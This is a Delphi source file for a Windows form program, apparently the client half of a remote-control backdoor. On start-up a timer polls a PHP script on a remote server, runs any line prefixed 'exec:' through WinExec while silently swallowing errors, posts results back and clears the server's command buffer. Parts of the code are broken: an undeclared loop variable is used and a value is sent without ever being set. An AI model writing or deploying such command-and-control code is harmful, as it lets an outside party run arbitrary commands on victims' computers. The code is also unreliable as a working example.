unit Main;

interface

uses
  Windows, Messages,  Graphics,  Controls,  Forms,  Dialogs,  StdCtrls, ExtCtrls,
  Buttons,  ComCtrls, SysUtils,  Classes, IdComponent, IdTCPConnection, IdHTTP,
  IdLogDebug, IdLogBase, IdAntiFreeze, IdAntiFreezeBase, IdIntercept, IdTCPClient,
  IdBaseComponent, MPlayer;

type
  // ---------------------------------------------------------------------------
  TForm1 = class(TForm)
    IdAntiFreeze1: TIdAntiFreeze;
    Panel1: TPanel;
    memoHTML: TMemo;
    HTTP: TIdHTTP;
    Label2: TLabel;
    LogDebug: TIdLogDebug;
    Splitter1: TSplitter;
    Edit1: TEdit;
    Timer1: TTimer;

    procedure btnGoClick(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    Procedure URLsend(const Plus: string; Sender: TObject);
    procedure FormCreate(Sender: TObject);
  end; // TForm1

var
  Form1: TForm1;

implementation

{$R *.DFM}

// *****************************************************************************
procedure TForm1.btnGoClick(Sender: TObject);
var
  StaryKurzor: TCursor;
begin
  StaryKurzor := Screen.Cursor;
  try // FINALLY
    Screen.Cursor := crHourGlass;
    memoHTML.Clear;
    HTTP.ProtocolVersion := pv1_1;
    HTTP.Request.Username := '';
    HTTP.Request.Password := '';
    HTTP.Request.ProxyServer := '';
    HTTP.Request.ProxyPort := StrToIntDef('', 80);
    HTTP.Request.ContentType := '';
    HTTP.Intercept := LogDebug;
    HTTP.InterceptEnabled := true;
    memoHTML.Lines.Text := HTTP.Get(Edit1.Text);
  finally
    Screen.Cursor := StaryKurzor;
  end; // TRY FINALLY
end;

// *****************************************************************************
procedure TForm1.URLsend(const Plus: string; Sender: TObject);
var
  S: string;
begin
  S := Edit1.Text;
  Edit1.Text := S + Plus;
  btnGoClick(Sender);
  Edit1.Text := S;
end;

// *****************************************************************************
function WithoutBR(S: String): String;
var
  I: integer;
begin
  While Pos('<BR>',S) > 0 do
  begin
    I := Pos('<BR>',S);
    Delete(S,I,4);
  end; // WHILE
  WithoutBR := S;
end;

// *****************************************************************************
procedure TForm1.Timer1Timer(Sender: TObject);
var
  Index: Integer;
  Subor: TSearchRec;
  Prikaz, Pom: String;
begin
  Timer1.Enabled := False; // Vypneme timer, kym nespracujeme aktualne operacie
  URLsend('/index.php?OP=buffer', Sender);
  for Index := 0 to Pred(memoHTML.Lines.Count) do
  begin
    Prikaz := WithoutBR(memoHTML.Lines[I]);

    // Exec prikaz
    if Pos('exec:', Prikaz) > 0 then
    begin
      Delete(Prikaz,Pos('exec:', Prikaz), 5);
      try // EXCEPTION
        WinExec(PChar(Prikaz), sw_ShowNormal);
      except
        // Utlmena vynimka
      end; // TRY EXCEPTION
    end // IF

    // PWD prikaz
    else if Prikaz = 'pwd' then
    begin
      URLsend('index.php?OP=addoutput&S='+Pom, Sender);
    end; // ELSE IF

    { DALSIE PRIKAZY }
  end;

  // Zaver
  URLsend('/index.php?OP=erasebuffer', Sender);
  Timer1.Enabled := True; // Zapneme timer
end;

// *****************************************************************************
procedure TForm1.FormCreate(Sender: TObject);
begin
  Timer1.Enabled := True;
end;

end.

